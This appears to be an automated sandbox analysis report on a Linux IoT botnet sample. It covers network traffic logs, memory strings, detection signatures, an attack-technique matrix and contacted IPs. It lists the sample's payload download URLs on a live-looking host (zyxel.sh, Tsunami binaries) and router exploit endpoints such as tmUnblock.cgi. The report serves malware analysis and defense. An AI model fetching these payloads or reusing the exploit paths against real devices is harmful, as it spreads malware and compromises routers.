    Source: unknownNetwork traffic detected: HTTP traffic on port 33864 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55462 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50730 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36138 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56510 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41482 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36878 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33166 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37104 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 37104
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48116 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57824 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51928 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39084 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54778 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35052 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 51928
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42544 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59122 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37294 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47764 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42736 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50858 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53180 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47618 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 47618
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35856 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46890 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37828 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33940 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58972 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59304 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 59304
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35036 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45536 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49556 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44332 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59092 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49052 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44576 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58918 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54932 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48988 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 48988
    Source: unknownNetwork traffic detected: HTTP traffic on port 58918 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58918 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58918 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38814 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37742 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58436 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59380 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59380 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59380 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44174 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44268 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44268 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59380 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44268 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52622 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42672 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39598 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40446 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 40446
    Source: unknownNetwork traffic detected: HTTP traffic on port 44268 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59380 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38330 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37548 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53072 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48362 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58532 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42294 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37196 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 37196
    Source: unknownNetwork traffic detected: HTTP traffic on port 42294 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42294 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44268 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48226 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42294 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47180 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58680 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35582 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35582 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51608 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48200 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35582 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35582 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37460 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48246 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47030 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59380 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54780 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44268 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54780 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55652 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54780 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47046 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47046 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47046 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39670 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47046 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54780 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33690 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59892 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59200 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59200 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59200 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59200 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56530 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39622 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41418 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56530 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56530 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53372 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34830 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41284 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59670 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60354 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56530 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54780 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43836 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58740 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44268 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45514 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47748 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33852 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51336 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48344 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33852 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59380 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53566 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53566
    Source: unknownNetwork traffic detected: HTTP traffic on port 33852 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53566
    Source: unknownNetwork traffic detected: HTTP traffic on port 54780 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34608 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48344 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33852 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52804 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33430 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52804 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 55555
    Source: /tmp/pjT3uuMrF1 (PID: 6230)Queries kernel information via 'uname':
    Source: pjT3uuMrF1, 6230.1.00000000e6e10c5a.000000001d80b088.rw-.sdmp, pjT3uuMrF1, 6234.1.00000000e6e10c5a.000000001d80b088.rw-.sdmpBinary or memory string: OqU!/etc/qemu-binfmt/arm
    Source: pjT3uuMrF1, 6230.1.00000000d2286406.00000000968295c1.rw-.sdmp, pjT3uuMrF1, 6234.1.00000000d2286406.00000000968295c1.rw-.sdmpBinary or memory string: 696Ll0x86_64/usr/bin/qemu-arm/tmp/pjT3uuMrF1SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/pjT3uuMrF1
    Source: pjT3uuMrF1, 6230.1.00000000e6e10c5a.000000001d80b088.rw-.sdmp, pjT3uuMrF1, 6234.1.00000000e6e10c5a.000000001d80b088.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
    Source: pjT3uuMrF1, 6230.1.00000000d2286406.00000000968295c1.rw-.sdmp, pjT3uuMrF1, 6234.1.00000000d2286406.00000000968295c1.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, type: MEMORY
    Source: Yara matchFile source: 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, type: MEMORY
    Source: Yara matchFile source: 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, type: MEMORY
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
    Obfuscated Files or Information
    1
    OS Credential Dumping
    11
    Security Software Discovery
    Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    Service Stop
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    File Deletion
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
    Non-Standard Port
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer4
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits3
    Ingress Tool Transfer
    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626439 Sample: pjT3uuMrF1 Startdate: 14/05/2022 Architecture: LINUX Score: 92 29 98.137.186.238 YAHOO-GQ1US United States 2->29 31 98.16.59.133 WINDSTREAMUS United States 2->31 33 98 other IPs or domains 2->33 37 Snort IDS alert for network traffic 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 3 other signatures 2->43 8 pjT3uuMrF1 2->8         started        10 gnome-session-binary sh gsd-print-notifications 2->10         started        12 xfce4-session rm 2->12         started        signatures3 process4 process5 14 pjT3uuMrF1 8->14         started        16 gsd-print-notifications 10->16         started        process6 18 pjT3uuMrF1 14->18         started        21 pjT3uuMrF1 14->21         started        23 pjT3uuMrF1 14->23         started        27 5 other processes 14->27 25 gsd-print-notifications gsd-printer 16->25         started        signatures7 35 Sample tries to kill multiple processes (SIGKILL) 18->35

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    pjT3uuMrF130%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://127.0.0.1:80/tmUnblock.cgi0%VirustotalBrowse
    http://127.0.0.1:80/tmUnblock.cgi0%Avira URL Cloudsafe
    http://103.136.43.52/bin0%Avira URL Cloudsafe
    http://103.136.43.52/zyxel.sh;0%Avira URL Cloudsafe
    http://103.136.43.52/bins/Tsunami.mips;100%Avira URL Cloudmalware
    http://103.136.43.52/bins/Tsunami.x860%Avira URL Cloudsafe
    http://192.168.0.14:80/cgi-bin/ViewLog.asp0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://127.0.0.1:80/tmUnblock.cgitrue
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://192.168.0.14:80/cgi-bin/ViewLog.aspfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/soap/encoding//%22%3EpjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpfalse
      high
      http://upx.sf.netpjT3uuMrF1false
        high
        http://103.136.43.52/binpjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://schemas.xmlsoap.org/soap/encoding/pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpfalse
          high
          http://schemas.xmlsoap.org/soap/envelope//pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpfalse
            high
            http://103.136.43.52/zyxel.sh;pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://103.136.43.52/bins/Tsunami.mips;pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://103.136.43.52/bins/Tsunami.x86pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/soap/envelope/pjT3uuMrF1, 6230.1.000000003d1482af.00000000e83cf7de.r-x.sdmp, pjT3uuMrF1, 6234.1.000000003d1482af.00000000e83cf7de.r-x.sdmpfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              172.119.50.247
              unknownUnited States
              20001TWC-20001-PACWESTUSfalse
              184.14.83.56
              unknownUnited States
              7011FRONTIER-AND-CITIZENSUSfalse
              95.142.40.179
              unknownRussian Federation
              210079EUROBYTEEurobyteLLCMoscowRussiaRUfalse
              98.63.246.128
              unknownUnited States
              7922COMCAST-7922USfalse
              98.40.24.35
              unknownUnited States
              7922COMCAST-7922USfalse
              98.34.189.138
              unknownUnited States
              7922COMCAST-7922USfalse
              98.109.42.180
              unknownUnited States
              701UUNETUSfalse
              197.231.215.3
              unknownunknown
              36974AFNET-ASCIfalse
              85.136.26.166
              unknownSpain
              12357COMUNITELSPAINESfalse
              41.145.255.171
              unknownSouth Africa
              5713SAIX-NETZAfalse
              98.26.162.86
              unknownUnited States
              11426TWC-11426-CAROLINASUSfalse
              112.4.118.153
              unknownChina
              56046CMNET-JIANGSU-APChinaMobilecommunicationscorporationCNfalse
              85.246.119.51
              unknownPortugal
              3243MEO-RESIDENCIALPTfalse
              178.142.108.15
              unknownGermany
              9145EWETELCloppenburgerStrasse310DEfalse
              118.243.197.117
              unknownJapan4685ASAHI-NETAsahiNetJPfalse
              112.135.36.69
              unknownSri Lanka
              9329SLTINT-AS-APSriLankaTelecomInternetLKfalse
              118.31.117.207
              unknownChina
              37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
              94.114.237.14
              unknownGermany
              6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
              95.19.23.90
              unknownSpain
              12479UNI2-ASESfalse
              184.37.225.211
              unknownUnited States
              5778CENTURYLINK-LEGACY-EMBARQ-RCMTUSfalse
              94.151.70.233
              unknownDenmark
              9158TELENOR_DANMARK_ASDKfalse
              62.74.130.50
              unknownGreece
              12361PANAFONET-ASAthensGreeceGRfalse
              212.53.57.210
              unknownRussian Federation
              12335TARIORUfalse
              184.43.77.3
              unknownUnited States
              5778CENTURYLINK-LEGACY-EMBARQ-RCMTUSfalse
              184.192.180.47
              unknownUnited States
              10507SPCSUSfalse
              172.174.11.192
              unknownUnited States
              7018ATT-INTERNET4USfalse
              31.138.151.7
              unknownNetherlands
              15480VFNL-ASVodafoneNLAutonomousSystemNLfalse
              98.212.79.2
              unknownUnited States
              7922COMCAST-7922USfalse
              41.122.213.2
              unknownSouth Africa
              16637MTNNS-ASZAfalse
              62.152.157.231
              unknownPoland
              1902PAN-NETDeutscheTelekomPan-NetsroSKfalse
              62.118.118.98
              unknownRussian Federation
              8359MTSRUfalse
              95.124.218.217
              unknownSpain
              3352TELEFONICA_DE_ESPANAESfalse
              31.97.234.255
              unknownUnited Kingdom
              12576EELtdGBfalse
              184.196.87.187
              unknownUnited States
              10507SPCSUSfalse
              94.227.247.130
              unknownBelgium
              6848TELENET-ASBEfalse
              172.253.94.196
              unknownUnited States
              15169GOOGLEUSfalse
              98.223.166.4
              unknownUnited States
              7922COMCAST-7922USfalse
              172.75.35.22
              unknownUnited States
              11426TWC-11426-CAROLINASUSfalse
              42.30.91.61
              unknownKorea Republic of
              9644SKTELECOM-NET-ASSKTelecomKRfalse
              94.27.69.153
              unknownUkraine
              12530GOLDENTELECOM-UKRAINEKyivstarPJSCUAfalse
              184.111.71.51
              unknownUnited States
              7922COMCAST-7922USfalse
              184.250.93.56
              unknownUnited States
              10507SPCSUSfalse
              184.14.83.60
              unknownUnited States
              7011FRONTIER-AND-CITIZENSUSfalse
              62.13.69.248
              unknownSweden
              2119TELENOR-NEXTELTelenorNorgeASNOfalse
              94.79.152.6
              unknownGermany
              6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
              42.43.212.19
              unknownKorea Republic of
              9644SKTELECOM-NET-ASSKTelecomKRfalse
              62.81.143.21
              unknownSpain
              6739ONO-ASCableuropa-ONOESfalse
              172.98.191.71
              unknownUnited States
              18779EGIHOSTINGUSfalse
              85.33.215.229
              unknownItaly
              3269ASN-IBSNAZITfalse
              85.150.105.206
              unknownNetherlands
              5390EURONETNLfalse
              98.34.189.112
              unknownUnited States
              7922COMCAST-7922USfalse
              62.69.168.204
              unknownFinland
              59766ASWICITYITfalse
              98.224.197.245
              unknownUnited States
              7922COMCAST-7922USfalse
              98.10.209.93
              unknownUnited States
